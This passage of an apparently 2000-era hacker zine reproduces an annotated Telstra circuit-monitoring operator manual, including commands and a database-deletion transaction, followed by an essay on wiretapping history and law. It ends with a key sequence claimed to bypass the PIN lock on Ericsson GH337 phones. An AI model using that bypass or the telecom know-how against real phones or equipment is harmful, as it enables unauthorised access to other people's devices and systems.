printer to the ON LINE condition.
3. CONTROLLER AND COMMUNICATIONS INTERFACE (CCI)
3.1 GENERAL
The CCI provides a general interface between the ICM computer and
the Exchange ICM equipment. The CCI gives the Central computer
the ability to collect the data gathered by the ICMMs and to send
reports back to the CCI.
The CCI also provides various functions to the local Exchange
staff. By entering commands at the printer/terminal or by
selecting lines from the front panel, local staff can also
interrogate, monitor and test circuits.
3.1.1 Power Up
When the CCI is powered up or a break occurs in the power
supply a message is printed out to that effect which the
date, time and amount of memory available.
The CCI is very susceptible to noise and breaks on the
power supply. For example, starting and running emergency
power supplies. If the CCI powers down and then up again
all data collected previously is lost. This should be kept
in mind as it is the usual reason for loss of reports or
reports which state that all poll data is missing.
3.1.2 Diagnostics
Should an error occur during power up the error condition
will be displayed on the two 7 segment LEDs on the front
panel of the CCI.
7 segment display Meaning
r0 ROM Checksum fault
r1 RAM1 Fault
r2 RAM2 Fault
rF 64K RAM Fault
If no errors are detected then the letters 'PF' are
displayed and the internal audible alarm is activated.
To reset the alarm press the 'LAMPS/BUZZER' key.
The LED display should now be slowly rotating.
3.2 FRONT PANEL
3.2.1 Idle LED Pattern
Slowly rotating indicates processor is running.
3.2.2 Modem LEDs
The following LEDs are alight if the modem is correctly
connected and functioning :-
DTR, RTS, CD, DSR and CTR
3.2.3 Printer/Terminal Port
Refer to 2.2 for configuration of the printer. If the
printer is correctly configured and connected then the
'PRINTER ON-LINE' LED should glow.
3.2.4 GPIB Ports
When everything is running normally the 'POLLING' LED for
the GPIB should be flickering to indicate data transfer
between CCI and the ICMMs.
Should a GPIB 'FAULT' LED glow, refer to 3.3.1
3.2.5 Push Buttons
- Select GPIB. Refer 3.3.1
- Select ICMM. " 3.3.1
- Select Line. " 3.3.1 and 3.4
- Disable Printer. Used to inform the CCI that
the printer is out for
maintenance or faulty. The
Central computer will hold all
reports until the printer is
enabled again.
- Lamps/Buzzer. Has two functions:-
Checks that all LEDs are OK.
Resets acoustic alarm.
3.3 ERROR DIAGNOSTICS
In addition to the error diagnostics described during powerup, the
CCI continually monitors the state of the ICMMs. If they fail in
any way a message is printed out informing the local staff of the
type of error.
Message Meaning
ICMM not communicating No CCI-ICMM communication.
Usually means that the ICMM is
switched off or the GPIB cable
is disconnected.
Configured ICMM The CCI has recognised that
the ICMM has powered-up or
that the Central computer has
re-configured the CCI and
ICMMs.
Failed to config ICMM The CCI has failed to find the
ICMM's configurations.
ICMM fail..ROM ICMM ROM in error.
ICMM fail..RAM Faulty ICMM RAM
ICMM fail..timer Faulty ICMM timer chip
ICMM fail..GPIA ICMM GPIB chip fail
ICMM fail..DMAC Direct memory access chip
faulty
ICMM fail..unknown Undetermined hardware fault
When such errors occur, if the ICMMs involved are in the CCI Group
definitions, then a status message is automatically sent to the
Central computer.
3.3.1 GPIB Monitoring
If an error occurs in an ICMM then the 'FAULT' LED on the
CCI front panel glows. The push buttons can be used to
locate where the fault occured.
The 'SELECT GPIB' button is used to select one of three
GPIB ports. The GPIB selected is displayed in the 7
segment LEDs - 1, 2 or 3.
If the CCI detected an actual GPIB port failure in the CCI,
then the letters 'HF' (hardware) or 'CF' (controller) would
toggle, with the GPIB, number in the LED display. If no
error is detected then only the GPIB number would be shown.
The 'SELECT ICMM' button is used to select one of fourteen
possible ICMMs on the previously selected GPIB. The ICMM
number is shown is hexa-decimal. (Refer to Appendix B).
If the selected GPIB had a hardware fault then the ICMMs
are marked unequipped and the letters 'nE' would toggle
with the ICMM number.
If the GPIB hardware is OK, but the CCI can't talk with the
ICMM, then the letters 'nC' would toggle.
3.4 LINE TESTING
Local staff can monitor the state of a particular line via the
front panel of the CCI. To select a line the user must select the
GPIB and ICMM as described above and then select the line with the
'SELECT LINE' button. The line number is displayed in
hexa-decimal. The LED above the 'SELECT LINE' button will be on
when the line is seized and off when the line is idle.
Holding the 'SELECT LINE' button operated will cycle very rapidly
through all the lines on the ICMM.
The 7 segment LEDs return to rotating state after a short
interval.
4. INDIVIDUAL CIRCUIT MONITORING MODULES
4.1 GENERAL
The CCI communicates with the ICMMs via 3 GPIB buses. Each GPIB
supports up to 14 ICMMs, a maximum of 42 ICMMs per CCI. Each ICMM
monitors a maximum of 256 lines. A CCI has a capacity of 10,752
lines.
The ICM rack contains a Terminal Unit frame which has a capacity
of 14 ICMMs maximum.
On this basis, a CCI can support 3 ICM racks, each with a maximum
of 14 ICMMs. If 2-3 racks are installed, only the first rack is
equipped with a CCI.
The ICMMs are numbered from right to left, looking from the front
of the rack.
4.2 INSTALLATION
4.2.1 Precautions
As the ICMM is a big board care must be taken when
installing them in the Terminal Unit Frame.
Use Anti-static precautions.
Ensure the ICMM power On/Off switch (top-front of the ICMM
is OFF before installing or removing.
5. SYSTEM OPERATION
5.1 LOCAL FUNCTIONS FROM PRINTER/TERMINAL
5.1.1 General
Various functions can be performed by entering commands on
the printer/terminal. These commands do not affect the
polling between the Central Computer and the CCI.
After power up the CCI is placed in the IDLE mode. This is
the normal mode and the CCI must always be returned to this
condition. The IDLE mode is indicated by the prompt:-
IDLE >
In this mode, local staff can make enquiries about the
state of the system.
5.2 IDLE MODE COMMANDS
5.2.1 Listing Configurations
Print all the Group Definitions stored in the CCI. Enter
the command:- L
5.2.2 ICMM Status Report
An ICMM status table, giving the state of the 42 ICMMs, can
be printed by entering:-
ICMM
A detailed report on a particular ICMM can be printed with
the command:-
ICMM <number>
where <number> = 1..42.
eg ICMM 8 will print the status of ICMM 8
5.2.3 Central Computer Link Status
The state of the communication link to the Central computer
can be printed with the command:-
SA
5.2.4 Central Computer Link Statistics
The transmission statistics are printed with :-
SS
5.2.5 Dynamic Memory Status
The current state of the dynamic memory pool:-
MEM
5.2.6 Time Request
The current CCI time:-
T
5.2.7 Poll Status
The current Central polling status:-
P
5.2.8 Request Group Report
To obtain a listing of the groups relevant to CCI, from the
Central Computer, enter:-
GREP
5.2.9 Request Transaction Report
Refer to 5.3.2 Transaction Mode
To obtain a list of the transactions waiting for
processing, enter:-
TREP
5.2.10 Help
To list all the commands, their format and meanings, enter:-
H
5.3 SPECIAL MODE COMMANDS
From the IDLE mode the CCI can be placed in other special modes.
A listing of commands relevant to that mode can be obtained with
the Help command.
5.3.1 Local Poll Mode
This mode is used to poll a single ICMM for the
pegcount/usage data, or poll a Group of lines. The mode is
entered using the command:-
POLL
and exited with a CTRL+E.
When the Poll mode is entered the prompt returned is :-
POLL >
5.3.1.1 Polling An ICMM
Enter the following command:-
I <icmm no.> <reg type> <lines>
Where icmm no. = 1..42
ref type = ACT for active register
= IDL for idle register
lines = 1 to 254 e.g.
I 4 ACT 1 10 = ICMM 4 ACT lines 1 to 10.
5.3.1.2 Polling a Group
Enter the following command:-
G <local group ref> <reg type>
where local group ref is the group number
register type. See 5.3.1.1.
eg G 22 ACT = Group 22, Active registers.
The local group reference number can be obtained
by using the 'L' command in the IDLE mode.
5.3.1.3 Swapping Registers
This function should not be used as it affects
the data stored in the idle regs. It is
pass-word protected at the Central site.
5.3.2 Transactions Mode
This mode is used to update the ICM database
At this stage it is not intended to be used in WA. The
mode is pass-word protected.
See Section 6. DATABASE MANAGEMENT for the current method
of creating and updating the database.
It is imperative when using Transaction Mode to be fully
conversant with the database structure and to exercise extreme
care. If a reasonable degree of logic is not used then the entire
database for the Exchange will be corrupted.
Enter the following command:-
TRANS
Prompt is:-
password?
If the password is entered correctly the returned prompt is:-
TRAN >
The user now has the authority to modify the ICM database for the
Exchange.
When all the transactions have been entered, and the mode exited
with CTRL+E, they are transmitted to the Central computer and
stored. The Central computer will inform the user of any errors
in the transactions but not incorrect data.
The next time the Central Computer updates the Group Definitions,
they will be sent down to the CCI.
Only a certain size buffer has been allocated for these
transactions. If the buffer fills, then the message 'Buffer Full'
is printed.
To clear the buffer, exit the mode and then re-enter to continue
with further transactions.
5.3.2.1 Content Of Transactions
Transactions contain both Group and Line
information. Each transaction must be prefixed
with one of the following symbols :-
'+' = Create/modify
'-' = Delete
'*' = Wildcard symbol for special use
5.3.2.2 Create/Modify a Group
Before adding a Group, or adding/removing lines
in a Group, the Group name must be specified,
and prefixed accordingly.
eg.
+ PRTA T PRTA-PRTH C1
5.3.2.3 Deleting a Group
The Group name must be specified.
eg.
- PRTA T PRTA-PRTH C1
This action will remove the group name and all
lines in the Group, if they exist.
5.3.2.4 Creating a Line
The Group name must exist and be specified then
the new Line name can be entered.
+ PRTA T PRTA-PRTH C1
+ 102054 034 7 9B 21
The Line name format is as follows :-
+ Add
1 The CCI number in the Exchange
04051 The ICMM and inlet numbers (ICMM=04, I/L=051)
034 The Circuit or traffic number
7 9B 21 The suite, rack and R/S
5.3.2.5 Modifying a Line
The same rules apply as for 5.3.2.4:-
+ PRTA T PRTA-PRTH C1 (Modify Group)
- 104051 034 7 9B 21 (Delete old line)
+ 108088 034 5 6A 18 (Add new line)
5.3.2.6 Deleting an Exchange
This transaction will delete the entire Exchange
database. Use with care!!
* PRTA
5.3.2.7 Editing Transactions
Editing of the transactions entered can be
performed before they are sent to the Central
Computer. Use the command :-
L
The CCI will list out the transactions in the
order they were entered, giving a line number
for each.
The line number can be used to delete, and
insert new transactions within the list.
To delete:- Enter D <line number>
To insert:- Enter I <line number> followed
the transaction. [sic - dunno]
5.3.3 Remote Terminal Mode
This mode has not been implemented.
It is password protected.
5.3.4 Message Mode
5.3.4.1 General
This mode can be used to send messages to the
Central site. The messages appear on the
Central Computer VDU.
Command is:-
MESSAGE
and the prompt returned is:-
MESS >
Enter your message, terminating each line with a
return. Transmit the message with a double
return.
MESS > Hello Central site. <return>
Goodbye. <return> <return>
CTRL+E
5.3.4.2 Editing Messages
Limited facilities are provided to edit messages
before transmission.
To list the lines of text of the message enter:-
L
The CCI will print the message with line numbers.
The line number can be used to delete or insert
lines of text in the message.
To delete a line, enter:-
D <line number>
To insert a line, enter:-
I <line number> followed by the text.
5.3.5 Test Mode
This mode can be used to observe the change of state of
lines in an ICMM. As the line/s change they are printed
out. eg,
Line 2 On
Line 8 Off
Line 2 Off
Line 6 On
Enter the mode with the command:-
TEST
A prompt is returned:-
TEST >
Enter ICMM <icmm no> <lines>
eg, ICMM 2 1 10 = ICMM 2 inlets 1 to 10
To stop testing, enter CTRL+E
A new set of inlets can now be checked.
To exit Test mode, enter CTRL+E.
5.3.6 Communications Mode
This mode is used during the commissioning.
5.4 EXITING MODES
When the user has finished performing functions in one of the
modes previously described, the mode MUST be exited with the
keys:- CTRL+E
The CCI will respond with the IDLE prompt.
6. DATABASE MANAGEMENT
6.1 GENERAL POLICY
All updating of the ICM Database in WA will be done by the central
site staff as will be the initial loading of data for each new
site.
6.2 NEW INSTALLATIONS
When a new site is first equipped the Installation team will
notify the central site staff of the group name information and
line details by means of forms WG4372 shts 5-8. These forms, once
completed will be forwarded to the central site at the following
address.
OIC NTMC
13th FLOOR, 639 WELLINGTON ST
PERTH 6000
6.3 AMENDING EXISTING DATABASES
The local exchange staff will be responsible for notifying the
central site staff of any changes to their data. This is done by
means of form EW325 supplied in book form from the central site.
On reciept of an update advice form the central site staff will
amend the data base and send a group report to the exchange (group
numbering changes as additions or deletions are made to the data
base).
6.4 CODING OF DATA FOR ICM
Although the central site staff will check any data before
entering it into the database time and effort can be reduced by
coding the data in a format suitable for ICM. Appendix (A)
describes the coding principles used in WA for the ICM database.
Exchange staff should be aware that it can take several days to
enter the changes into their database due to central site staff
having to thoroughly check the data in order to avoid corruption
of the database.
7. ICM REPORTS
7.1 GENERAL
The ICM System gathers pegcount and usage data from all the
exchanges, according to a Poll/Report schedule.
The Schedule is arranged to automatically send reports at realistic
times. Typically these times are set to cover busy traffic
periods and a 3-4 hour poll period is usually chosen.
The Report Schedule can be modified to suit the needs of an
Exchange.
Any of the following Report types can be generated, and sent to
the Exchange. There are some limitations which will be discussed
later on.
7.2 REPORT TYPES
Currently, there are only four report types supplied by
manufacturer of the ICM system.
7.2.1 Exception Report
This is a report that highlights suspect circuits.
Only those circuits, whose behaviour departs from preset
thresholds, are listed.
Typical thresholds and their settings are :-
LOW PEGCOUNT (LP) :- Less than 1 call an hour.
HIGH PEGCOUNT (HP) :- More than 50 calls an hour.
LOW HOLDING (LH) :- Less than 30 sec. per call.
HIGH HOLDING (HH) :- More than 3550 sec. per call.
LOW USAGE (LU) :- Less than 50 sec. an hour.
HIGH USAGE (HU) :- More than 3550 sec. and hour.
ALWAYS IDLE (AI) :- Never seized.
ALWAYS BUSY (AB) :- Permanently held.
These settings can vary from Group to Group, hour by hour,
and day by day, depending on the Group type and the average
traffic pattern over a period of time. These thresholds will
require a lot of "fine tuning" to avoid listing non-faulty
circuits.
An Exception Report can be generated for one or more groups
in an Exchange. It is not possible to report on an
individual circuit in a group.
This is the most common type of report.
7.2.2 Detailed Report
A Detailed report lists each circuit in a group or groups
regardless of whether they are exceptions or not.
Not normally sent to an Exchange due to the length of the
report, but available on request.
7.2.3 Group Summary Report
A Group Summary report lists all the groups in the Exchange
database, with the number of circuits, the always idle,
always busy, average hold time, and erlangs carried by the
Group. [wtf is an erlang?]
Not normally sent but available on request.
7.2.4 Crossed Leads
This report compares the pegcount and usage figures of all
circuits and then lists those with identical figures. It
is not inferred that circuits with the same figures are
necessarily crossed. If the same two circuits appear on
subsequent reports then it is a fair assumption.
Not run normally as it is very slow but available on
request.
8. HARDWARE MAINTENANCE AND ROUTINE CHECKS
8.1 GENERAL
Exchange and ICM equipment is NOT covered by a maintenance
contract and all repair is a Telstra cost.
No attempt must be made to repair the CCI or ICMMs.
Any abnormal ICM equipment behaviour should be referred to the
NTMC OIC on 08 9420 7027.
The NTMC OIC will determine the appropriate action to be taken.
8.2 PROVEN FAULTY EQUIPMENT
8.2.1 ICMM
Any proven faulty ICMM should be replaced with a spare
board ordered from the Central Parts Store. The OIC NTMC
will authorise the dispatch of a replacement board and the
return of the faulty board to the Central Parts Store.
The Exchange will arrange the transport of a faulty item
by a suitable carrier.
8.2.2 CCI
The OIC NTMC will arrange for the dispatch of a spare CCI
from the Central Parts Store as for faulty ICMM boards.
8.2.3 PRINTER
The printer is maintained by the Business Network Branch
and all faults should be reported to
1107.
The supply of paper and ribbons is the responsibility of
the Exchange.
8.3 ALARMS
The ICM internal alarms have not been connected to the main
Exchange alarms due to lack of software details.
8.4 ROUTINE CHECKS
The CCI and printer should be checked regularly (daily).
8.4.1 CCI
Ensure that the following LEDs on the front panel are on:-
The 2.7 segment display is slowly rotating.
Printer ON-LINE
Modem (except RI)
GPIB POLLING (flickering)
8.4.2 ICMM
Check that there are no alarm LEDs on.
8.4.3 PRINTER
Check that the printer is on LINE
In IDLE mode.
Has plenty of paper.
9. FAULT FINDING (Using ICM Reports and Local Functions)
9.1 GENERAL
The ICM system does not find or localise faults. It can only
highlight possible faulty circuits.
Due to the averaging technique used, the thresholds set for each
group of lines, by the Central site, and the need for a very
accurate database, the first occurrence of a faulty line in a
report should not be of great concern. When a circuit starts to
appear regularly, then it is time to act.
Generally, the longer the Poll period the better. This enables
the system to gather more data and provide much bigger samples.
9.2 FAULT TYPES
9.2.1 ALWAYS IDLE
Any circuit consistently indicating AI could be in one of
the following conditions :-
Incoming Circuit
- Blocked at distant end.
- Blocked at I/C relayset
- Relayset (either end) unplugged or not equipped
- Bearer fault
- New circuit (in database but not in service)
- Old circuit (not in service but in database)
- Being seized for less than 2 seconds
- Database incorrect
- Wiring to ICMM incorrect
Outgoing Circuit
- The above
- GV grading fault
9.2.2 ALWAYS BUSY
- Not releasing
- Data circuit that has not been released
- Bearer fault
9.2.3 HIGH PEGCOUNT, LOW HOLDING (HP and LH)
Depending on the average hold-time, the circuit may be
suffering from one of the following symptoms :-
- Very low holding. Noisy bearer
- Approx 7-10 seconds. MFC failure
- Approx 90 seconds. Timing out due to no answer
- Between 90 seconds. Timing out due to no answer
- Between 30-60 seconds. Call to Service Operator
- Approx 10-20 seconds. TRT running
9.2.4 LOW PEGCOUNT, HIGH HOLDING (LP and HH)
- Not releasing properly, waiting until forced
- Non STD route
- One or more very long calls in the Poll period
9.2.5 LOW PEGCOUNT, NORMAL HOLDING
- Out of traffic for part of Poll Period
- Grading anomaly (if Crossbar)
- Late choice SxS circuit
9.2.6 HIGH PEGCOUNT, NORMAL HOLDING
- Grading anomaly (if crossbar)
- Early choice SxS circuit
APPENDIX A
1. CODING OF DATA FOR ICM
1.1 INTRODUCTION
This section describes the coding principles used to enter data
into the WA ICM data base. Information is entered onto a series
of forms (WG 4372 shts 5 to 8) by the installation team or forms
EW325 by operations staff. These forms are then forwarded to the
Central Site staff for uploading into the ICM database.
GROUP DEFINITIONS
Each group definition in ICM consists or a Group Name. Threshold,
Line Configuration, Inlet and Line Name. The installer need only
fill in the details for the group line and group name as listed
under the heading DEVICE on WG 4372. The other details will be
coded by the central site staff.
1.3 GROUP NAME
The following syntax has been adopted for creating group names in
ICM.
character character character character character
group 1 group 2 group 3 group 4 group 5
AAAA B CCCC-DDDD EEEE
Character Group 1 -- (AAAA) -- 4 alpha -- ICM monitoring point.
Location name code normally the LRD or MJR code for the station.
Character Group 2 -- (B) -- 1 alpha -- Group type
Normally "T" for a traffic circuit or "S" for a statmeter or common
control.
Character Group 3 -- (CCCC) -- 4 alphanumeric -- Originating/
control station or
Common Control 1.
Character Group 4 -- (DDDD) -- 4 alphanumeric -- Terminating/Non
Control station or
Common Control 2.
Character Group 5 -- (EEEE) -- 4 alphanumeric -- Route or Common
Control
designation.
The coding of traffic groups (ie, where Character Group 2 = T) is
fairly straight forward. eg.
Where the traffic group is between Katanning ARM (KATA) and
Bunbury ARM (BBRA) and the monitoring is being carried out at
Katanning the coding would be KATA T KATA-BBRA M1
Permissable values for Character Group 5 when a traffic circuit is
being monitored are as follows (n = The number of the group, * =
space.)
Fn** ARF terminating Cn** 10C terminating
Mn** ARM terminating KN** ARK terminating
ZnI* Bothway circuit incoming ZnU* Bothway circuit outgoing
Qn** Queue position Xn** PABX circuit
Pn** SPC terminating Sn** Entraide junctions
All definitions are available from LRD (Country) or MJR (Metro).
1.3 THRESHOLD
The threshold is a number which indicates the threshold table to
be used in the ICM system. In WA this is normally set to 00.
1.4 LINE CONFIGURATION
The Line Configuration field is used to set the parameters that
the ICM will monitor. In WA this is usually set to LE256 for a
traffic group and LE005 for a common control group. The first
character (L) indicates that we are monitoring the Leading edge of
the transition, the second character (E) indicates that the pulse
should be an Earth pulse and the 3 digit number is the timer in
milliseconds that the change of state needs to exist to be
recognised as an event.
1.5 INLET
The ICM Inlet field is made up of:
The Exchange Name -- 4 alpha -- (LRD code for the Exchange)
The CCI Number -- 1 numeric -- in the range 1 to 3
The ICMM Number -- 2 numeric -- in the range 1 to 42
The Line Number -- 3 numeric -- in the range 1 to 256
1.6 LINE NAME
The line name consists of up to 25 characters the first 3 of which
must be numeric. This field is usually set out in the following
manner.
For traffic groups.
Circuit or trunk number -- 3 numeric
Suite or route number -- 3 numeric or 4 alphanumeric
for 10C
Rack -- 3 numeric or I/U for 10C
Position or junctor -- 3 numeric or 4 Hex address for
10C
In the case of outgoing circuits from PRTA only the Route Number
is added to the end of this field in the manner VRnnn.
the overall line entry for the previous example in sect 4.3 might
look like this;
KATA T KATA-BBRA M1 00 LE256 KATA 1 20 120 001 05A 004 021
A similar example for a 10C circuit might look like this;
PRTH T PRTH-BBRA M1 00 LE256 PRTH 1 25 123 001 R036 U 0AB4
1.7 CODING OF COMMON CONTROL MONITORING POINTS
When the points being monitored are not traffic groups but are
leads from the common control equipment, the coding for the data base
becomes somewhat different. Chracter groups 3 and 4 will now
represent the item of equipment being monitored. Permissable
values and their meanings are listed below. (n = numeric
character, * = space, # = alpha character .)
character character equipment
group group
3 4
GVn* KMRn GVM 1/80 GV MARKER
GVn* XY** GVM 2/160 GV MARKER
H4** REGn REG-H4
#H4* GUXY REG-H4-XY
#SS** LPnn SS 16/40
#REG* LPnn REG-LP / REG-E-LP
#AN** KSnn AN-KS PT 1
#AN** REGn AN-REG PT 1
#KS** LPnn KS
#DS** **** DS
#RSI* LPnn RSM
Common Control Equipt in MSE's
M*** **** MARKER
VM** **** ROUTE MARKER
KSR* **** CODE SENDER
AN** **** ANALYSER
RSI* Y1** or Y2** REGISTER FINDER MARKER
RA** **** REGISTER ANALYSER MARKER
SSAB **** SENDER FINDER (SSA/B)
REG* Y1nn REGISTER Y1
REG* Y2nn REGISTER EH2Y2
RTC* **** ROUTE TIME CONGESTION LEAD
Common Control Equipment in ARM's
In all cases of common control equipment coding the next field,
character group 5 is used to describe the lead being monitored, EG
TKM1,SM2,DL.ETC.
The Circuit or trunk number column in the line name field is used
to indicate the number of the item of equipment. No other columns
are required for common control coding.
A group name entry for the second Register Y1 in an ARM then may
be coded as follows;
PRTA S REG - Y1 TKM5 002.
[EOF - Marlinspike 4/5/00 - World Ends Tommorrow!]
........[ A look into wiretapping ]...................[ psyops ]............
Wiretapping is the traditional term for interception of telephone conver-
sations. This should not be taken too literally. The word is no longer
restricted to communications traveling by wire, and contemporary wire-
taps are more commonly placed on radio links or inside telephone offices.
The meaning has also broadened in that the thing being tapped need no
longer be a telephone call in the classic sense; it may be some oher
form of electronic communication, such as fax or data.
Compared with the more precise but more general phrase "commu-
nications interception," the word "wiretapping" has two connotations.
Much the stronger of these is that a wiretap is aimed at a particular target,
in sharp contrast to the "vacuum cleaner" interception widely practiced
by national intelligence agencies. The weaker connotation is that it is
being done by the police.
The history of wiretapping in the United States is in fact two histories
intertwined. It is a history of wiretapping per se--that is, a history of the
installation and use of wiretaps by police, intelligence agencies, hones
citizens, businesses, and criminals. It is also a history of society's legal
response to wiretapping by these various groups.
The origins of wiretapping lie in two quiet different practices: eaves-
dropping and letter opening. "Eavesdropping," although once more re-
stricted in meaning, has come to describe any attempt to overhear con-
versations without the knowledge of the participants. "Letter opening"
takes in all acquisition, opening reading, and copying of written mes-
sages, also without knowledge of the sending and receiving parties.
Telecommunication has unified and systematized these practices.
Before the electronic era, a conversation could only be carried on by
people located within earshot of each other, typically a few feet apart.
Neither advanced planning nor great effort on the part of the participans
was required to ensure a high degree of security. Written communica-
tions were more vulnerable, but intercepting one was still a hit-or-miss
affair. Messages traveled by a variety of postal services, couriers, travel-
ers, and merchants. Politically sensitive messages, in particular, could not
be counted on to go by predictable channels, so special couriers were
sometimes employed.
And written messages enjoyed another sort of protection. Regardless of
a spy's skill with flaps and seals, there was no guarantee that, if a letter was
intercepted, opened, and read, the victim would not notice the intrusion.
Since spying typically has to be done covertly in order to succeed, the
chance of detection is a substantial deterrent.
Electronic communication has changed all this in three fundamental
ways: it has made telecommunication too convenient to avoid; it has,
despite appearances, reduced the diversity of channels by which written
messages once traveled; and it has made the act of interception invisible
to the target.
Conversation by telephone has achieved an almost equal footing with
face-to-face conversation. It is impossible today to run a successful busi-
ness without the telephone, and eccentric even to attempt to do without
the telephone in private life. The telephone provides a means of commu-
nication so effective and convenient that even people who are aware of
the danger of being overheard routinely put aside their caution and use it
to convey sensitive information.
As the number of channels of communication has increased (there are
now hundres of communication companies, with myriad fibers, satel-
lites, and microwave links), the diversity of communication paths has
diminished. In the days of oxcart and sail, there was no registry of the
thousands of people willing to carry a message in return for a tip from
the recipient. Today, telecommunications carriers must be registered with
national and local regulatory bodies and are well known to trace associ-
ations and industry watch groups. Thus, interception has become more
systematic. Spies, no longer faced with a patchwork of ad hoc couriers,
know better where to look for what thet seek.
Perhaps more important, interception of telecommunications leaves no
telltale "marks on the envelop." It is inherent in telecommunication--
and inseparable from its virtues--that the sender and the receiver of a
message have no way of telling who else may have recorded a copy.
Any discussion of wiretapping, particularly a legal discussion, is com-
plicated by the fact that electronics has not only made interception of
telecommunications possible; it has also made it easier to "bug" face-to-
face conversations. Bugging would be nearly irrelevant to the central sub-
ject of this document--Taking A Deeper Trip Into Wiretapping--were it not
for the fact that bugs and wiretaps are inseparably intertwined in law and
jurisprudence and named by one collective term: electronic surveillance.
Wiretaps and bugs are powerful investigative tools. They allow the
eavesdropper to overhear conversations between politicians, criminals,
lawyers, or lovers without the targets' knowing that their words are
being share with unwanted listeners. Electronic surveillance is a tool
that can detect criminal conspiracies and provide prosecutors with strong
evidence--the conspirators' incriminating statements in their own voices
--all without danger to law-enforcement officers. On the other hand, the
very invisibility on which electronic surveillance depends for its effective-
ness makes it evasive of oversight and readily adaptable to malign uses.
Electronic surveillance can be and has been used by those in power to
undermine the democratic process by spying on their political opponents.
In light of this, it is not surprising that Congress and the courts have
approached wiretapping and bugging with suspicion.
Today, communication enjoys a measure of protection under US law,
and neither government agents nor private citizens are permitted to wire-
tap at will. This has not always been the case. The current view--that
wiretaps are a kind of search--has evolved by fits and starts over a cen-
tury and a half. The Supreme Court ruled in 1967 that the police
may not employ wiretaps without court authorization. Congress has embraced
this principle, limiting police use of wiretaps and setting standards for the
granting of warrants. The same laws prohibit most wiretapping by private
citizens.
The rules against unwarranted wiretapping are not absolute, however.
For example, the courts ruled in 1992 (United States vs. David Lee Smith,
978 F. 2nd 171, US App) that conversations over cordless phones were
not protected and that police tapping of cordless phones did not require a
search warrant. A 1994 statute (Communications Assistance for Law En-
forcement Act of 1994, Public Law 103-414, §202) extended the warrant
requirements of the earlier law to cover cordless phones. The law also
makes some exceptions for businesses intercepting the communications
of their own employees on company property.
Contact.
I don't like to be contacted with subjects like "I think your article
sucks," but since you can't make everyone happy, I must learn to live
with it. For the ones with a positive attitude, you can e-mail me at
psyops@evidence2k.de with all questions security-related.
........[ Ericsson GH337 ].............................[ Pottsy ]............
Pin Codes:
Breaking the PIN CODE on 337 phones is simple, ... when asked to enter
pincode , cain in **04*0000*0000*0000# that should get thru... ive tried
this on models gh337 and 338, I assume that other models may also have this
exploit...
GH337 tricks:
The Secret Menu
Key : < Left Arrow
> Right Arrow
C CLR
To access the secret Menu, from the main screen type >*<<*<* You
will be presented with the software release information.. use the <, >,
arrows to scroll the through the menu..
the menu options:
FLASH - This reboots the Phone and resets the welcome message... doesnt
seem to reset anything else.. could have something to do with Flash Memory..
TEXT CHECK - Once going into this option, pressing any key will scroll
through all the messages your 337 displays.. eg. `read mail?' or `phone
book' any text that is programmed into the phone, exluding shit u put in
there yourself.. eg phone numbers etc.. im still trying to figure out a way
to change these messages but no luck yet.. in my next file if i figure it
out and its possible ill document it..
INIT EEPROM - (EEPROM), for those who dont know, stands for [Electrically
Erasable Programmable Read-Only Memory]... This option restarts the phones
software..
Shortcut:
0 followed by # will bring up the LAST CALL message, and the phone number
you last called, or who called you.
If you have any info that isnt in this guide please contact me :
pottsy15@hotmail.com
.................................[ outro ]..................................
This section doesnt actually do anything. Its just another thing I can put my
name on in the TOC so it looks like I do something around here.
.eof.
